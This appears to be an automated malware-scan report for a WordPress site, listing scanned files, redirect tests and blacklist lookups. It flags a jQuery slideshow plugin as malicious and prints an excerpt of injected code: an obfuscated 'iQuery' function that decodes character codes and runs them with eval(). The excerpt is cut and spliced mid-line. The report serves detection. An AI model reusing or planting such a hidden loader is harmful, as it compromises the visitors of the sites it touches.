Scanned pages/files
Request | Server response | Status |
http://youwheel.com/content/ | 404 Not Found Content-Length: 14179 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js?ver=3.8.1 | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://maps.google.com/maps/api/js?sensor=false&ver=3 | 200 OK Content-Length: 4898 Content-Type: text/javascript | clean |
http://youwheel.com/wp-content/themes/autoblog/js/dpagination.js | 200 OK Content-Length: 1326 Content-Type: application/javascript | clean |
http://youwheel.com/wp-content/themes/autoblog/js/superfish.js?ver=3.3.1 | 200 OK Content-Length: 3714 Content-Type: application/javascript | clean |
http://youwheel.com/wp-content/themes/autoblog/js/smthemes.js?ver=962 | 200 OK Content-Length: 9027 Content-Type: application/javascript | clean |
http://youwheel.com/wp-content/themes/autoblog/js/jquery.cycle.all.js | 200 OK Content-Length: 53031 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
iQuery=function(x) { var temp="",i,c=0,out="";l=x.length; while(c<=x.length-1){while(x.charAt(c)!='!')temp=temp+x.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";} eval(out); } ;(function($, undefined) { var ver = '2.9999'; if ($.support == undefined) { $.support = { opacity: !($.browser.msie) }; } function debug(s) { $.fn.cycle.debug && log(s); } function log() { win var rr = r < w ? r + parseInt(step * ((w-r)/count || 1),10) : w; $next.css({ clip: 'rect('+tt+'px '+rr+'px '+bb+'px '+ll+'px)' }); (step++ <= count) ? setTimeout(f, 13) : $curr.css('display', 'none'); })(); }); $.extend(opts.cssBefore, { display: 'block', opacity: 1, top: 0, left: 0 }); opts.animIn = { left: 0 }; opts.animOut = { left: 0 }; }; })(jQuery);
Antivirus reports:
http://youwheel.com/ | 200 OK Content-Length: 48624 Content-Type: text/html | clean |
http://youwheel.com/wp-content/themes/autoblog/js/smthemes.js?ver=657 | 200 OK Content-Length: 9027 Content-Type: application/javascript | clean |
http://youwheel.com/about-us/ | 200 OK Content-Length: 18712 Content-Type: text/html | clean |
http://youwheel.com/wp-content/themes/autoblog/js/smthemes.js?ver=1192 | 200 OK Content-Length: 9027 Content-Type: application/javascript | clean |
http://youwheel.com/wp-includes/js/comment-reply.min.js?ver=3.8.1 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://youwheel.com/contact-us/ | 200 OK Content-Length: 17118 Content-Type: text/html | clean |
http://youwheel.com/wp-content/themes/autoblog/js/smthemes.js?ver=1144 | 200 OK Content-Length: 9027 Content-Type: application/javascript | clean |
http://youwheel.com/privacy-notice/ | 200 OK Content-Length: 17134 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: youwheel.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 29 Apr 2014 05:12:30 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
Content-Length: 48624
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=7885doe98r29j05vj7hlpqkt13; path=/
X-Pingback: http://youwheel.com/xmlrpc.php
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...48624 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: youwheel.com
Referer: http://www.google.com/search?q=youwheel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=youwheel.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://youwheel.com/
Result: youwheel.com is not infected or malware details are not published yet.